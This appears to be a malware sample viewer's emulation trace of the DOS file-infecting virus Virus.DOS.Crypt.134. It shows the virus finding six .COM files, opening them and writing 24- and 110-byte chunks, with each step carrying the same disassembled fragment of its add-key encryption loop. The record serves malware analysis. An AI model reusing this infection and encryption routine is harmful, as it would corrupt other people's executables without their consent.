Sample viewer

vx.netlux.org/Virus.DOS.Crypt.134

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:59:13.638864885Z 78 PC: 12a5f | Find first file
2018-12-17T22:59:13.646604184Z 61 PC: 12a67 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:59:13.654188284Z 44 PC: 12a70 | Get time 0x12a70: mov di, 0x111
0x12a73: mov byte ptr [di], dl
0x12a75: mov byte ptr [0x17a], dl
0x12a79: mov dx, 0x100
0x12a7c: mov cx, 0x18
0x12a7f: nop
0x12a80: mov ah, 0x40
0x12a82: int 0x21
0x12a84: mov di, 0x186
0x12a87: xor bx, bx
0x12a89: mov dl, byte ptr [bx + 0x118]
0x12a8d: cmp bx, 0x6e
0x12a90: nop
0x12a91: je 0x12a9d
0x12a93: add dl, byte ptr [0x17a]
0x12a97: inc bx
0x12a98: mov al, dl
0x12a9a: stosb byte ptr es:[di], al
0x12a9b: jmp 0x12a89
0x12a9d: mov bx, word ptr [0x178]
2018-12-17T22:59:13.656737262Z 64 PC: 12a84 | Write file or device (Write 24 bytes on handle 5)
2018-12-17T22:59:13.665144042Z 64 PC: 12aac | Write file or device (Write 110 bytes on handle 5)
2018-12-17T22:59:13.668169937Z 62 PC: 12ab0 | Close file
2018-12-17T22:59:13.683620894Z 79 PC: 12ab4 | Find next file
2018-12-17T22:59:13.687891705Z 61 PC: 12a67 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:59:13.695877988Z 44 PC: 12a70 | Get time 0x12a70: mov di, 0x111
0x12a73: mov byte ptr [di], dl
0x12a75: mov byte ptr [0x17a], dl
0x12a79: mov dx, 0x100
0x12a7c: mov cx, 0x18
0x12a7f: nop
0x12a80: mov ah, 0x40
0x12a82: int 0x21
0x12a84: mov di, 0x186
0x12a87: xor bx, bx
0x12a89: mov dl, byte ptr [bx + 0x118]
0x12a8d: cmp bx, 0x6e
0x12a90: nop
0x12a91: je 0x12a9d
0x12a93: add dl, byte ptr [0x17a]
0x12a97: inc bx
0x12a98: mov al, dl
0x12a9a: stosb byte ptr es:[di], al
0x12a9b: jmp 0x12a89
0x12a9d: mov bx, word ptr [0x178]
2018-12-17T22:59:13.698563309Z 64 PC: 12a84 | Write file or device (Write 24 bytes on handle 5)
2018-12-17T22:59:13.707447213Z 64 PC: 12aac | Write file or device (Write 110 bytes on handle 5)
2018-12-17T22:59:13.710674941Z 62 PC: 12ab0 | Close file
2018-12-17T22:59:13.719125133Z 79 PC: 12ab4 | Find next file
2018-12-17T22:59:13.72206785Z 61 PC: 12a67 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:59:13.730224557Z 44 PC: 12a70 | Get time 0x12a70: mov di, 0x111
0x12a73: mov byte ptr [di], dl
0x12a75: mov byte ptr [0x17a], dl
0x12a79: mov dx, 0x100
0x12a7c: mov cx, 0x18
0x12a7f: nop
0x12a80: mov ah, 0x40
0x12a82: int 0x21
0x12a84: mov di, 0x186
0x12a87: xor bx, bx
0x12a89: mov dl, byte ptr [bx + 0x118]
0x12a8d: cmp bx, 0x6e
0x12a90: nop
0x12a91: je 0x12a9d
0x12a93: add dl, byte ptr [0x17a]
0x12a97: inc bx
0x12a98: mov al, dl
0x12a9a: stosb byte ptr es:[di], al
0x12a9b: jmp 0x12a89
0x12a9d: mov bx, word ptr [0x178]
2018-12-17T22:59:13.732255234Z 64 PC: 12a84 | Write file or device (Write 24 bytes on handle 5)
2018-12-17T22:59:13.736788738Z 64 PC: 12aac | Write file or device (Write 110 bytes on handle 5)
2018-12-17T22:59:13.739406198Z 62 PC: 12ab0 | Close file
2018-12-17T22:59:13.744793687Z 79 PC: 12ab4 | Find next file
2018-12-17T22:59:13.747715945Z 61 PC: 12a67 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:59:13.755490602Z 44 PC: 12a70 | Get time 0x12a70: mov di, 0x111
0x12a73: mov byte ptr [di], dl
0x12a75: mov byte ptr [0x17a], dl
0x12a79: mov dx, 0x100
0x12a7c: mov cx, 0x18
0x12a7f: nop
0x12a80: mov ah, 0x40
0x12a82: int 0x21
0x12a84: mov di, 0x186
0x12a87: xor bx, bx
0x12a89: mov dl, byte ptr [bx + 0x118]
0x12a8d: cmp bx, 0x6e
0x12a90: nop
0x12a91: je 0x12a9d
0x12a93: add dl, byte ptr [0x17a]
0x12a97: inc bx
0x12a98: mov al, dl
0x12a9a: stosb byte ptr es:[di], al
0x12a9b: jmp 0x12a89
0x12a9d: mov bx, word ptr [0x178]
2018-12-17T22:59:13.757742415Z 64 PC: 12a84 | Write file or device (Write 24 bytes on handle 5)
2018-12-17T22:59:13.765760661Z 64 PC: 12aac | Write file or device (Write 110 bytes on handle 5)
2018-12-17T22:59:13.769195791Z 62 PC: 12ab0 | Close file
2018-12-17T22:59:13.778452172Z 79 PC: 12ab4 | Find next file
2018-12-17T22:59:13.781654096Z 61 PC: 12a67 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:59:13.788757345Z 44 PC: 12a70 | Get time 0x12a70: mov di, 0x111
0x12a73: mov byte ptr [di], dl
0x12a75: mov byte ptr [0x17a], dl
0x12a79: mov dx, 0x100
0x12a7c: mov cx, 0x18
0x12a7f: nop
0x12a80: mov ah, 0x40
0x12a82: int 0x21
0x12a84: mov di, 0x186
0x12a87: xor bx, bx
0x12a89: mov dl, byte ptr [bx + 0x118]
0x12a8d: cmp bx, 0x6e
0x12a90: nop
0x12a91: je 0x12a9d
0x12a93: add dl, byte ptr [0x17a]
0x12a97: inc bx
0x12a98: mov al, dl
0x12a9a: stosb byte ptr es:[di], al
0x12a9b: jmp 0x12a89
0x12a9d: mov bx, word ptr [0x178]
2018-12-17T22:59:13.791576937Z 64 PC: 12a84 | Write file or device (Write 24 bytes on handle 5)
2018-12-17T22:59:13.798868775Z 64 PC: 12aac | Write file or device (Write 110 bytes on handle 5)
2018-12-17T22:59:13.801646533Z 62 PC: 12ab0 | Close file
2018-12-17T22:59:13.810745547Z 79 PC: 12ab4 | Find next file
2018-12-17T22:59:13.813730107Z 61 PC: 12a67 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:59:13.821103301Z 44 PC: 12a70 | Get time 0x12a70: mov di, 0x111
0x12a73: mov byte ptr [di], dl
0x12a75: mov byte ptr [0x17a], dl
0x12a79: mov dx, 0x100
0x12a7c: mov cx, 0x18
0x12a7f: nop
0x12a80: mov ah, 0x40
0x12a82: int 0x21
0x12a84: mov di, 0x186
0x12a87: xor bx, bx
0x12a89: mov dl, byte ptr [bx + 0x118]
0x12a8d: cmp bx, 0x6e
0x12a90: nop
0x12a91: je 0x12a9d
0x12a93: add dl, byte ptr [0x17a]
0x12a97: inc bx
0x12a98: mov al, dl
0x12a9a: stosb byte ptr es:[di], al
0x12a9b: jmp 0x12a89
0x12a9d: mov bx, word ptr [0x178]
2018-12-17T22:59:13.824336341Z 64 PC: 12a84 | Write file or device (Write 24 bytes on handle 5)
2018-12-17T22:59:13.832410481Z 64 PC: 12aac | Write file or device (Write 110 bytes on handle 5)
2018-12-17T22:59:13.835377674Z 62 PC: 12ab0 | Close file
2018-12-17T22:59:13.858195064Z 79 PC: 12ab4 | Find next file
2018-12-17T22:59:13.86145112Z 61 PC: 12a67 | Open file (Filename = 'PAH.COM')
2018-12-17T22:59:13.868943213Z 44 PC: 12a70 | Get time 0x12a70: mov di, 0x111
0x12a73: mov byte ptr [di], dl
0x12a75: mov byte ptr [0x17a], dl
0x12a79: mov dx, 0x100
0x12a7c: mov cx, 0x18
0x12a7f: nop
0x12a80: mov ah, 0x40
0x12a82: int 0x21
0x12a84: mov di, 0x186
0x12a87: xor bx, bx
0x12a89: mov dl, byte ptr [bx + 0x118]
0x12a8d: cmp bx, 0x6e
0x12a90: nop
0x12a91: je 0x12a9d
0x12a93: add dl, byte ptr [0x17a]
0x12a97: inc bx
0x12a98: mov al, dl
0x12a9a: stosb byte ptr es:[di], al
0x12a9b: jmp 0x12a89
0x12a9d: mov bx, word ptr [0x178]
2018-12-17T22:59:13.871941835Z 64 PC: 12a84 | Write file or device (Write 24 bytes on handle 5)
2018-12-17T22:59:13.880093473Z 64 PC: 12aac | Write file or device (Write 110 bytes on handle 5)
2018-12-17T22:59:13.88355884Z 62 PC: 12ab0 | Close file
2018-12-17T22:59:13.894013827Z 79 PC: 12ab4 | Find next file